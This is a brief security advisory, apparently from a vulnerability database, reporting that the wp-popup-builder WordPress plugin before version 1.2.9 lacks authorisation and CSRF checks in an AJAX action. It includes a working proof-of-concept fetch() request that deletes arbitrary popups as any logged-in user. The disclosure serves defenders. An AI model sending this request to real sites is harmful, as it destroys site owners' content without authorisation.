The plugin does not have authorisation and CSRF check in an AJAX action, allowing any authenticated users, such as subscribers to delete arbitrary Popup
fetch(‘/wordpress/wp-admin/admin-ajax.php?action=delete_popup’, { method: ‘POST’,headers:{“content-type”:“application/x-www-form-urlencoded”}, body: “bid=1”, }).then(response => response.text()) .then(data => console.log(data));
CPE | Name | Operator | Version |
---|---|---|---|
wp-popup-builder | lt | 1.2.9 |